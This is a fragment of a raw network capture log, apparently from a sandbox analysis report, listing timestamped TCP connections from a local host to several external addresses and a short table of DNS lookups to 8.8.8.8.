                                                Sep 10, 2021 11:28:24.695432901 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.695658922 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.695667028 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.695693016 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.695750952 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696830034 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.696898937 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.696924925 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696942091 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.696949005 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696990967 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696994066 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697009087 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697035074 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697062969 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697071075 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697112083 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697119951 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697160006 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697165966 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697179079 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697201014 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697231054 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697295904 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697338104 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697348118 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697386026 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697393894 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697432995 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698538065 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698606014 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698616028 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698659897 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698668003 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698713064 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698796034 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698843002 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698852062 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698899984 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698905945 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698951006 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.699999094 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700064898 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700074911 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700119019 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700504065 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700567961 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700644970 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700695038 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700750113 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700839996 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701127052 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701186895 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701222897 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701277018 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701308012 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701358080 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701395988 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701442957 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701456070 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701502085 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.702769041 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.702883005 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.703100920 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.703152895 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.703670979 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.703732967 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720750093 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720794916 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720819950 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720828056 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720841885 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720851898 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720855951 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720895052 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720896959 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720921993 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720927000 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720936060 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720957994 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720994949 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721007109 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721060991 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721292019 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721330881 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721380949 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721414089 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721431971 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721476078 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.722407103 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.722805023 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.722898960 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.722917080 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.722974062 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.724235058 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.724261045 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.724925995 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.725006104 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.725322008 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.725737095 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.725773096 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.726006031 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.726022959 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.726190090 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.726247072 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733357906 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733428001 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733465910 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733479977 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733504057 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733515024 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733537912 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733540058 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733561993 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733570099 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733594894 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733597994 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733627081 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733635902 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733649969 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733689070 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733700037 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733747005 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.735622883 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.735735893 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.735801935 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.737041950 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.737118959 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.737179041 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.739213943 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.739305019 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.739391088 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746005058 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746109009 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746126890 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746146917 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746171951 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746212959 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746222019 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746237040 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746294022 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746304989 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746314049 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746340036 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746376038 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746398926 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746413946 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746485949 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746496916 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746551991 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746551991 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746572971 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746601105 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746643066 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746654987 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746711016 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.747304916 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.747395992 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.747409105 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.747463942 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.748523951 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.748620987 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.748642921 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.748725891 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.748965979 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749113083 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749146938 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749169111 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749181986 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749218941 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749274969 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749326944 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749356031 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749403000 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749425888 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749432087 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749480009 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749516964 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749524117 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749548912 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749567032 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749610901 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749613047 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749631882 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749659061 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749695063 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749697924 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749721050 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749742031 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749763012 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749784946 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.749804020 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.749809980 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750067949 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750142097 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750168085 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750185966 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750247955 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750299931 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750386000 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750402927 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750438929 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750488997 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750505924 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750725031 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750746965 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750758886 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750765085 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750787020 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750797033 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750824928 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750854969 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.750873089 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.750936985 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.751414061 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.751588106 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.751605988 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.751660109 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.751688004 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.751806974 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.751883984 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.751919985 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.752126932 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.752335072 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.752361059 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.752707005 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.753156900 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.753426075 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.753460884 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.753528118 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.755590916 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.755721092 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.755794048 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.771270990 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.771452904 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.771557093 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:34.882105112 CEST44349767104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:34.882185936 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:35.079473972 CEST44349767104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:35.079576015 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:35.224147081 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:35.224304914 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:35.423747063 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:35.423866987 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:29:29.341856956 CEST4990280192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:29.342384100 CEST4990380192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:29.368361950 CEST804990213.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:29.368468046 CEST804990313.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:29.368531942 CEST4990280192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:29.368578911 CEST4990380192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:29.369950056 CEST4990280192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:29.380408049 CEST804990213.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:29.380575895 CEST4990280192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:29.384037971 CEST804990313.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:29.384238958 CEST4990380192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:29.396130085 CEST804990213.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:29.450870037 CEST804990213.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:29.450978994 CEST4990280192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:35.671751022 CEST4991080192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:35.676143885 CEST4991180192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:35.698846102 CEST804991013.225.29.132192.168.2.5
                                                Sep 10, 2021 11:29:35.699101925 CEST4991080192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:35.701522112 CEST4991080192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:35.703577042 CEST804991113.225.29.132192.168.2.5
                                                Sep 10, 2021 11:29:35.703944921 CEST4991180192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:35.713876963 CEST804991013.225.29.132192.168.2.5
                                                Sep 10, 2021 11:29:35.713984013 CEST4991080192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:35.728111029 CEST804991113.225.29.132192.168.2.5
                                                Sep 10, 2021 11:29:35.728230000 CEST804991013.225.29.132192.168.2.5
                                                Sep 10, 2021 11:29:35.728379011 CEST4991180192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:35.792062998 CEST804991013.225.29.132192.168.2.5
                                                Sep 10, 2021 11:29:35.794589043 CEST4991080192.168.2.513.225.29.132
                                                Sep 10, 2021 11:29:51.558620930 CEST4995480192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:51.558720112 CEST4995580192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:51.585236073 CEST804995513.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:51.585274935 CEST804995413.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:51.585434914 CEST4995480192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:51.585448027 CEST4995580192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:51.585664034 CEST4995580192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:51.607537031 CEST804995513.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:51.607640982 CEST4995580192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:51.612251997 CEST804995513.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:51.669495106 CEST804995513.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:51.669645071 CEST4995580192.168.2.513.225.29.199
                                                Sep 10, 2021 11:29:59.395843029 CEST804990313.225.29.199192.168.2.5
                                                Sep 10, 2021 11:29:59.397609949 CEST4990380192.168.2.513.225.29.199
                                                Sep 10, 2021 11:30:04.958889961 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:30:04.958955050 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:30:04.959628105 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:30:04.959683895 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:30:05.731026888 CEST804991113.225.29.132192.168.2.5
                                                Sep 10, 2021 11:30:05.731137037 CEST4991180192.168.2.513.225.29.132
                                                Sep 10, 2021 11:30:16.363599062 CEST4996880192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:16.364242077 CEST4996980192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:16.391508102 CEST804996813.225.29.204192.168.2.5
                                                Sep 10, 2021 11:30:16.391814947 CEST804996913.225.29.204192.168.2.5
                                                Sep 10, 2021 11:30:16.394807100 CEST4996980192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:16.394812107 CEST4996880192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:16.402246952 CEST804996813.225.29.204192.168.2.5
                                                Sep 10, 2021 11:30:16.402348995 CEST4996880192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:16.404545069 CEST4996980192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:16.414880991 CEST804996913.225.29.204192.168.2.5
                                                Sep 10, 2021 11:30:16.414988041 CEST4996980192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:16.432553053 CEST804996913.225.29.204192.168.2.5
                                                Sep 10, 2021 11:30:16.717156887 CEST804996913.225.29.204192.168.2.5
                                                Sep 10, 2021 11:30:16.717315912 CEST4996980192.168.2.513.225.29.204
                                                Sep 10, 2021 11:30:21.612600088 CEST804995413.225.29.199192.168.2.5
                                                Sep 10, 2021 11:30:21.612720966 CEST4995480192.168.2.513.225.29.199
                                                Sep 10, 2021 11:30:46.422378063 CEST804996813.225.29.204192.168.2.5
                                                Sep 10, 2021 11:30:46.422643900 CEST4996880192.168.2.513.225.29.204

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 10, 2021 11:28:13.748769045 CEST5244153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:13.784257889 CEST53524418.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:15.706577063 CEST6217653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:15.734880924 CEST53621768.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:16.219919920 CEST5959653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:16.247761965 CEST53595968.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:16.711635113 CEST6529653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:16.736382961 CEST6318353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:16.750183105 CEST53652968.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:16.775331974 CEST53631838.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:19.458614111 CEST6015153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:19.499867916 CEST53601518.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:19.808762074 CEST5696953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:19.839265108 CEST53569698.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:19.886234045 CEST5516153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:19.921276093 CEST53551618.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:20.111187935 CEST5475753192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:20.146970034 CEST53547578.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:21.565500975 CEST4999253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:21.601167917 CEST53499928.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:22.062802076 CEST6007553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:22.101077080 CEST53600758.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:22.938153982 CEST5501653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:22.975914955 CEST53550168.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:23.347479105 CEST6434553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:23.389220953 CEST53643458.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:23.511346102 CEST5712853192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:23.536730051 CEST53571288.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:24.558005095 CEST5479153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:24.585437059 CEST53547918.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:38.539724112 CEST5046353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:38.573756933 CEST53504638.8.8.8192.168.2.5
